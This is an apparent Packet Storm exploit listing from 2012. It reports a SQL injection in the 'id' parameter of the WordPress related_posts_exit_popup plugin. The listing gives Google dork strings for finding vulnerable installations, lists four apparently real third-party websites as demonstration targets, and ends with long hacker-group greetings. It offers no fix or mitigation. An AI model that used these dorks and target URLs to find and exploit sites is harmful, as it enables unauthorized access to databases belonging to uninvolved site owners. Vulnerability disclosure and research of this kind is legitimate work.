WordPress Related Posts Exit Popup SQL Injection

2012-11-11T00:00:00
ID PACKETSTORM:118026
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2012-11-11T00:00:00

Description

                                        
                                            `######################In the name of GOD#######################  
# Exploit Title: Wordpress related_posts_exit_popup SQL Injection Vulnerability  
# Google Dork: inurl:"/related_posts_exit_popup_window.php"  
# OR intitle:"Thanks for visiting our site"  
# Exploit Author: Ashiyane Digital Security Team  
# Category: Web Application  
# Tested on: Windows 7  
###############################################################  
* Location: http://site.com/wp-content/plugins/related_posts_exit_popup/related_posts_exit_popup_window.php?&id=[SQLi]  
* Demo: http://modelingprocess.com/free/wp-content/plugins/related_posts_exit_popup/related_posts_exit_popup_window.php?&id=2571  
* http://a-np.com/pain/wp-content/plugins/related_posts_exit_popup/related_posts_exit_popup_window.php?&id=600  
* http://gtafares.com/Downtown-Toronto/wp-content/plugins/related_posts_exit_popup/related_posts_exit_popup_window.php?&id=1443  
* http://cancer-infoguide.com/wp-content/plugins/related_posts_exit_popup/related_posts_exit_popup_window.php?&id=862  
***************************************************************  
* Greetz to: My Lord ALLAH  
* Sp Tnx To: Muslims From All Over The World   
* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad™,Black-Hole,Classic,Encoder,ERroR,Hashor  
* HASSAN20,HidDeEn,hossein19123,jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu,MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H,Pr0grammer,PrinceofHacking  
* Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3,The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X  
* Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R  
* And All Of My Friends   
* The Last One : My Self, Milwar   
***************************************************************  
###############################################################  
`